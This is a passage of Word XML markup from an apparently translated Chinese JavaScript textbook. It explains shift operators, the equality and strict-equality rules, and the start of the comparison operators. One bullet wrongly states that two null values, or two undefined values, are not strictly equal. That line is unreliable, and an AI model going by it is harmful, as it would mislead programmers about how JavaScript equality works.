        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>，以此类推，例如，</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>＞＞</w:t>
      </w:r>
      <w:r>
        <w:t>1=3</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>-7</w:t>
      </w:r>
      <w:r>
        <w:t>＞＞</w:t>
      </w:r>
      <w:r>
        <w:t>1=-4</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>无符号右移（＞＞＞）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＞＞＞</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＞＞</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>一样，只是左边的高位总是填补</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，与原来的操作数符号无关，例如，</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>＞＞</w:t>
      </w:r>
      <w:r>
        <w:t>4=-1</w:t>
      </w:r>
      <w:r>
        <w:t>，但是</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>＞＞＞</w:t>
      </w:r>
      <w:r>
        <w:t>4=0x0FF</w:t>
      </w:r>
      <w:r>
        <w:t>FFFFF</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="4_9_Guan_Xi_Biao_Da_Shi_"/>
      <w:r>
        <w:t>4.9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　关系表达式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本节介绍</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的关系运算符。关系运算符用于测试两个值之间的关系（比如</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>相等</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>小于</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:t>的属性</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>），根据关系是否存在而返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。关系表达式总是返回一个布尔值，通常在</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>语句（参照第</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>章）中使用关系表达式，用以控制程序的执行流程。接下来的几节将会讲述相等和不等运算符、比较运算符和</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中其他两个关系运算符</w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="4_9_1_Xiang_Deng_He_Bu_Deng_Yun_Suan_Fu_"/>
      <w:r>
        <w:t>4.9.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　相等和不等运算符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“===”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符用于比较两</w:t>
      </w:r>
      <w:r>
        <w:t>个值是否相等，当然它们对相等的定义不尽相同。两个运算符允许任意类型的操作数，如果操作数相等则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，否则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>“===”</w:t>
      </w:r>
      <w:r>
        <w:t>也称为严格相等运算符（</w:t>
      </w:r>
      <w:r>
        <w:t>strict equality</w:t>
      </w:r>
      <w:r>
        <w:t>）（有时也称做恒等运算符（</w:t>
      </w:r>
      <w:r>
        <w:t>identity operator</w:t>
      </w:r>
      <w:r>
        <w:t>）），它用来检测两个操作数是否严格相等。</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符称做相等运算符（</w:t>
      </w:r>
      <w:r>
        <w:t>equality operator</w:t>
      </w:r>
      <w:r>
        <w:t>），它用来检测两个操作</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>数是否相等，这里</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>相等</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的定义非常宽松，可以允许进行类型转换。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>支持</w:t>
      </w:r>
      <w:r>
        <w:t>“=”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“===”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符。你应当理解这些</w:t>
      </w:r>
      <w:r>
        <w:t>（赋值、相等、恒等）运算符之间的区别，并在编码过程中小心使用。尽管它们都可以称做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>相等</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，但为了减少概念混淆，应该把</w:t>
      </w:r>
      <w:r>
        <w:t>“=”</w:t>
      </w:r>
      <w:r>
        <w:t>称做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>得到或赋值</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，把</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>称做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>相等</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，把</w:t>
      </w:r>
      <w:r>
        <w:t>“===”</w:t>
      </w:r>
      <w:r>
        <w:t>称做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>严格相等</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>“!=”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“!==”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符的检测规则是</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“===”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符的求反。如果两个值通过</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>的比较结果为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，那么通过</w:t>
      </w:r>
      <w:r>
        <w:t>“!=”</w:t>
      </w:r>
      <w:r>
        <w:t>的比较结果则为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。如果两值通过</w:t>
      </w:r>
      <w:r>
        <w:t>“===”</w:t>
      </w:r>
      <w:r>
        <w:t>的比较结果为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，那么通过</w:t>
      </w:r>
      <w:r>
        <w:t>“!==”</w:t>
      </w:r>
      <w:r>
        <w:t>的比较结果则为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>4.10</w:t>
      </w:r>
      <w:r>
        <w:t>节会提到，</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>！</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符是布尔非运算符。我们只要记住</w:t>
      </w:r>
      <w:r>
        <w:t>“!=”</w:t>
      </w:r>
      <w:r>
        <w:t>称</w:t>
      </w:r>
      <w:r>
        <w:t>做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>不相等</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“!==”</w:t>
      </w:r>
      <w:r>
        <w:t>称做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>不严格相等</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>就可以了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>3.7</w:t>
      </w:r>
      <w:r>
        <w:t>节已经提到，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象的比较是引用的比较，而不是值的比较。对象和其本身是相等的，但和其他任何对象都不相等。如果两个不同的对象具有相同数量的属性，相同的属性名和值，它们依然是不相等的。相应位置的数组元素是相等的两个数组也是不相等的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>严格相等运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“===”</w:t>
      </w:r>
      <w:r>
        <w:t>首先计算其操作数的值，然后比较这两个值，比较过程没有任何类型转换：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果两个值类型不相同，则它们不相等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果两个值都是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>或者都是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>，则它们不相等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果两个值都是布尔值</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>或都是布尔值</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，则它们相等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果其中一个值是</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>，或者两个值都是</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>，则它们不相等。</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>和其他任何值都是不相等的，包括它本身！通过</w:t>
      </w:r>
      <w:r>
        <w:t>x!==x</w:t>
      </w:r>
      <w:r>
        <w:t>来判断</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>是否为</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>，只有在</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>的时候，这个表达式的值才为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果两个值为数字且数值相等，则它们相等。如果一个值为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，另一个值为</w:t>
      </w:r>
      <w:r>
        <w:t>-0</w:t>
      </w:r>
      <w:r>
        <w:t>，则它们同样相等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果两个值为字符串，且所含的对应位上的</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>位数（参照</w:t>
      </w:r>
      <w:r>
        <w:t>3.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）完全相等，则它们相等。如果它们的长度或内容不同，则它们不等。两个字符串可能含义完全一样且所显</w:t>
      </w:r>
      <w:r>
        <w:t>示出的字符也一样，但具有不同编码的</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>位值。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>并不对</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>进行标准化的转换，因此像这样的字符串通过</w:t>
      </w:r>
      <w:r>
        <w:t>“===”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符的比较结果也不相等。第三部分的</w:t>
      </w:r>
      <w:r>
        <w:t>String.localeCompare()</w:t>
      </w:r>
      <w:r>
        <w:t>提供了另外一种比较字符串的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果两个引用值指向同一个对象、数组或函数，则它们是相等的。如果指向不同的对象，则它们是不等的，尽管两个对象具有完全一样的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>相等运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>和恒等运算符相似，但相等运算符的比较并不严格。如果两个操作数不是同一类型，那么相等运算符会尝试进行一些类型</w:t>
      </w:r>
      <w:r>
        <w:t>转换，然后进行比较：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果两个操作数的类型相同，则和上文所述的严格相等的比较规则一样。如果严格相等，那么比较结果为相等。如果它们不严格相等，则比较结果为不相等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果两个操作数类型不同，</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>相等操作符也可能会认为它们相等。检测相等将会遵守如下规则和类型转换：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>—</w:t>
      </w:r>
      <w:r>
        <w:t>如果一个值是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，另一个是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>，则它们相等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>—</w:t>
      </w:r>
      <w:r>
        <w:t>如果一个值是数字，另一个是字符串，先将字符串转换为数字，然后使用转换后的值进行比较。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>—</w:t>
      </w:r>
      <w:r>
        <w:t>如果其中一个值是</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，则将其转换为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>再进行比较。如果其中一个值是</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，则将其转换为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>再进行比较。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>—</w:t>
      </w:r>
      <w:r>
        <w:t>如果一个值是对象，另一个值是数字或字符串，则使用</w:t>
      </w:r>
      <w:r>
        <w:t>3.8.3</w:t>
      </w:r>
      <w:r>
        <w:t>节所提到的转换规则将对象转换为原始值，然后再进行比较。对象通过</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法或者</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法转换为原始值。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心的内置类首先尝试使用</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>，再尝试使用</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>，除了日期类，日期类只使用</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>转换。那些不是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心中的对象则通过各自的实现中定义</w:t>
      </w:r>
      <w:r>
        <w:t>的方法转换为原始值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>—</w:t>
      </w:r>
      <w:r>
        <w:t>其他不同类型之间的比较均不相等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这里有一个判断相等的小例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"1"==true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个表达式的结果是</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，这表明完全不同类型的值比较结果为相等。布尔值</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>首先转换为数字</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，然后再执行比较。接下来，字符串</w:t>
      </w:r>
      <w:r>
        <w:t>“1”</w:t>
      </w:r>
      <w:r>
        <w:t>也转换为了数字</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，因为两个数字的值相等，因此比较结果为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="4_9_2_Bi_Jiao_Yun_Suan_Fu_"/>
      <w:r>
        <w:t>4.9.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　比较运算符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>比较运算符用来检测两个操作数的大小关系（数值大小或者字母表的顺序）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>小于（＜）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果第一个操作数小于第二个操作数，则</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符的计算结果为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>大于</w:t>
      </w:r>
      <w:r>
        <w:t>（＞）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果第一个操作数大于第二个操作数，则</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符的计算结果为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
